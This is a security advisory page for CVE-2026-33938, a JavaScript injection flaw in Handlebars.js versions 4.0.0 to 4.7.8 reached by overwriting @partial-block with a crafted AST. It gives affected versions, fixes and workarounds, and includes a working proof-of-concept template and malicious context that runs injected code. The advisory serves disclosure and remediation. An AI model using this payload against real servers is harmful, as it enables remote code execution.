CVE-2026-33938: Handlebars.js has JavaScript Injection via AST Type Confusion by tampering @partial-block

Published Mar 27, 2026
·
Updated

Summary

The @partial-block special variable is stored in the template data context and is reachable and mutable from within a template via helpers that accept arbitrary objects. When a helper overwrites @partial-block with a crafted Handlebars AST, a subsequent invocation of {{> @partial-block}} compiles and executes that AST, enabling arbitrary JavaScript execution on the server.

Description

Handlebars stores @partial-block in the data frame that is accessible to templates. In nested contexts, a parent frame's @partial-block is reachable as @parent.partial-block. Because the data frame is a mutable object, any registered helper that accepts an object reference and assigns properties to it can overwrite @partial-block with an attacker-controlled value.

When {{> @partial-block}} is subsequently evaluated, invokePartial receives the crafted object. The runtime, finding an object that is not a compiled function, falls back to dynamically compiling the value via env.compile(). If that value is a well-formed Handlebars AST containing injected code, the injected JavaScript runs in the server process.

The handlebars-helpers npm package (commonly used with Handlebars) includes several helpers such as merge that can be used as the mutation primitive.

Proof of Concept

Tested with Handlebars 4.7.8 and handlebars-helpers:

javascript const Handlebars = require('handlebars'); const merge = require('handlebars-helpers').object().merge; Handlebars.registerHelper('merge', merge);

const vulnerableTemplate = {{#inline "myPartial"}} {{>@partial-block}} {{>@partial-block}} {{/inline}} {{#>myPartial}} {{merge @parent partial-block=1}} {{merge @parent partial-block=payload}} {{/myPartial}} ;

const maliciousContext = { payload: { type: "Program", body: [ { type: "MustacheStatement", depth: 0, path: { type: "PathExpression", parts: ["pop"], original: "this.pop", // Code injected via depth field — breaks out of generated function call depth: "0])),function () {console.error('VULNERABLE: RCE via @partial-block');}()));//", }, }, ], }, };

Handlebars.compile(vulnerableTemplate)(maliciousContext); // Prints: VULNERABLE: RCE via @partial-block

Workarounds

- Use the runtime-only build (require('handlebars/runtime')). The compile() method is absent, eliminating the vulnerable fallback path. - Audit registered helpers for any that write arbitrary values to context objects. Helpers should treat context data as read-only. - Avoid registering helpers from third-party packages (such as handlebars-helpers) in contexts where templates or context data can be influenced by untrusted input.

Other sources

Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the @partial-block special variable is stored in the template data context and is reachable and mutable from within a template via helpers that accept arbitrary objects. When a helper overwrites @partial-block with a crafted Handlebars AST, a subsequent invocation of {

IBM

Affected Software

3 affected componentsFixes available
npm/handlebars>=4.0.0<=4.7.8
4.7.9
Handlebarsjs Handlebars Node.js>=4.0.0<4.7.9
IBM API Connect V12 OnPrem<=All

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/handlebars to a version that resolves this vulnerability.

    Fixed in 4.7.9
  2. Upgrade

    Upgrade handlebars to a version that resolves this vulnerability.

    Fixed in 4.7.9
  3. Configuration

    Use the runtime-only build of Handlebars (e.g., require('handlebars/runtime')) instead of the full build to avoid the dynamically compiling fallback path.

    Handlebars build/runtime usage = require('handlebars/runtime')
  4. Configuration

    Audit all registered helpers and ensure they treat context data as read-only; avoid registering helpers from third-party packages (e.g., handlebars-helpers) in contexts where templates or context data can be influenced by untrusted input.

    Handlebars helpers registered helpers source and mutability = Do not register third-party helpers in untrusted contexts; treat context data as read-only

Event History

Mar 27, 2026
Advisory Published
via GitHub·06:20 PM
Data Sourced
via GitHub·06:20 PM
DescriptionSeverityWeaknessAffected Software
CVE Published
via MITRE·09:05 PM
Data Sourced
via MITRE·09:05 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·09:17 PM
RemedyDescriptionSeverityWeaknessAffected Software
Data Sourced
via Red Hat·10:03 PM
DescriptionSeverityAffected Software
Jul 7, 2026
Data Sourced
via IBM·12:00 AM
DescriptionAffected Software

Parent advisories

This vulnerability appears in the following advisories.

Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-33938?

CVE-2026-33938 has been assessed with a high severity level due to its potential impact on application security.

2

How do I fix CVE-2026-33938?

To fix CVE-2026-33938, upgrade Handlebars to version 4.7.9 or later.

3

What versions of Handlebars are affected by CVE-2026-33938?

CVE-2026-33938 affects Handlebars versions between 4.0.0 and 4.7.8.

4

What is the main vulnerability of CVE-2026-33938?

The main vulnerability of CVE-2026-33938 lies in the mutable `@partial-block` variable which can be overwritten by crafted Handlebars ASTs.

5

Is CVE-2026-33938 exploitable in production environments?

Yes, CVE-2026-33938 is exploitable in production environments where user inputs are not properly sanitized.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203